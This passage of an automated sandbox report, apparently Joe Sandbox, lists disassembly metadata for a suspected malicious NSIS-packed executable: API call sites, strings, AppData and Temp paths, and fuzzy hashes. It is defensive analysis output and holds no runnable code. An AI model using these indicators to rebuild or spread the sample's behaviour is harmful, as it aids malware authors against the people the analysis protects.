                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                 Joe Sandbox IDA Plugin
                                                 • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call
                                                • API String ID: 2624150263-251418098
                                                • Opcode ID: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                • Instruction ID: b9cd804fa769b9c0a994065299bacf789a546679ae48146ccc486c737bfd155f
                                                • Opcode Fuzzy Hash: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                • Instruction Fuzzy Hash: CBA175F1A00209ABDB11AFA5CD41AAFB7B8EF84354F10847BF601B62D1D77C99418B6D
                                                APIs
                                                • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                Strings
                                                • C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular, xrefs: 004021BD
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular
                                                • API String ID: 542301482-3139891972
                                                • Opcode ID: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                • Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
                                                • Opcode Fuzzy Hash: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                • Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: p!C$p!C
                                                • API String ID: 0-3125587631
                                                • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                • Instruction ID: ef217add9e462a39eaf01b2cd615f348b30b4b8a27c4232395f9688b09cd85c2
                                                • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                • Instruction Fuzzy Hash: 33C15831E04219DBDF18CF68C8905EEBBB2BF88314F25826AD85677380D734A942CF95
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                • Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
                                                • Opcode Fuzzy Hash: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                • Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                • Instruction ID: c2d777d08f91faa28cc29f4af1d325e94f95b1c5ec16d27d51274fd7273dd8ba
                                                • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                • Instruction Fuzzy Hash: A4E18971A04709DFDB24CF59C880BAAB7F1EB44305F15852EE497AB2D1D778AA91CF04
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404452
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404483
                                                • GetSysColor.USER32(?), ref: 00404494
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
                                                • lstrlenW.KERNEL32(?), ref: 004044B5
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
                                                • GetDlgItem.USER32(?,0000040A), ref: 00404530
                                                • SendMessageW.USER32(00000000), ref: 00404537
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404562
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
                                                • SetCursor.USER32(00000000), ref: 004045B6
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
                                                • SetCursor.USER32(00000000), ref: 004045D2
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404601
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613
                                                Strings
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: +C@$Call$N
                                                • API String ID: 3103080414-3697844480
                                                • Opcode ID: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                • Instruction ID: 544d3524579c470af9434eda2f0c3a81960274dfcdaaec18bef3a5beb83851d9
                                                • Opcode Fuzzy Hash: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                • Instruction Fuzzy Hash: 0C6192B1A00209BFDB109F60DD85AAA7B79FB84345F00843AF605B72D0D779A951CFA8
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                APIs
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406069,?,?), ref: 00405F09
                                                • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12
                                                  • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                  • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
                                                • wsprintfA.USER32 ref: 00405F4D
                                                • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
                                                • GlobalFree.KERNEL32(00000000), ref: 00406036
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D
                                                  • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                  • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                Strings
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %ls=%ls$[Rename]
                                                • API String ID: 2171350718-461813615
                                                • Opcode ID: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                • Instruction ID: 79e357045524b81a8ea21183b2a6189fe473d9766cb3db532b5e95eed637b89f
                                                • Opcode Fuzzy Hash: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                • Instruction Fuzzy Hash: D1315771100B05ABD220AB669D48F6B3A9CDF45744F15003FF902F62D2EA7CD9118ABC
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                Strings
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-1114763981
                                                • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                • Instruction ID: 662237d401549a0b86d5a4e6e01ff77a7750504751085e1aca306c60b5ffe750
                                                • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                • Instruction Fuzzy Hash: 3911B655800612A5D7303B18BC40AB776B8EF68750B52403FED8A732C5E77C5CA286BD
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040429B
                                                • GetSysColor.USER32(00000000), ref: 004042B7
                                                • SetTextColor.GDI32(?,00000000), ref: 004042C3
                                                • SetBkMode.GDI32(?,?), ref: 004042CF
                                                • GetSysColor.USER32(?), ref: 004042E2
                                                • SetBkColor.GDI32(?,?), ref: 004042F2
                                                • DeleteObject.GDI32(?), ref: 0040430C
                                                • CreateBrushIndirect.GDI32(?), ref: 00404316
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                • Instruction ID: b3876bbcbbff373df079470ccdc5149205509338ab7e68b668f4883140def8c6
                                                • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                • Instruction Fuzzy Hash: B22151B1600704ABCB219F68DE08B5BBBF8AF41714F04897DFD96E26A0D734E944CB64
                                                APIs
                                                • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                  • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID: @Hmu
                                                • API String ID: 4216380887-887474944
                                                • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                APIs
                                                • lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                • lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                • lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                • SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2531174081-0
                                                • Opcode ID: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                • Instruction ID: 0b7e0c68d9dca976d3f5af37e2abe0e5b3dfc86658143eccbc3f009734cc3570
                                                • Opcode Fuzzy Hash: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                • Instruction Fuzzy Hash: 3F21A171900518BACF11AFA5DD859CFBFB4EF85350F14817AF944B6290C7B98A90CFA8
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
                                                • GetMessagePos.USER32 ref: 00404BD3
                                                • ScreenToClient.USER32(?,?), ref: 00404BED
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                • Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
                                                • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                • Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                • MulDiv.KERNEL32(000F0CEB,00000064,000F0EEF), ref: 00402E20
                                                • wsprintfW.USER32 ref: 00402E30
                                                • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402E2A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                • Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
                                                • Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                • Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59
                                                APIs
                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                • GlobalFree.KERNEL32(?), ref: 1000256D
                                                • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                • GlobalFree.KERNEL32(?), ref: 00402950
                                                • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                • Instruction ID: c7dec26b55dd312fec5fb3faf1598927ec34475db9096b9e5e75d52a628400f5
                                                • Opcode Fuzzy Hash: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                • Instruction Fuzzy Hash: E521BDB1C00128BBDF216FA5DE49D9E7E79EF08364F10423AF964762E0CB794C418B98
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp$C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dll
                                                • API String ID: 3109718747-3571912477
                                                • Opcode ID: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                • Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
                                                • Opcode Fuzzy Hash: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                • Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                • Opcode Fuzzy Hash: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                APIs
                                                • GetDC.USER32(?), ref: 00401DB6
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E38
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
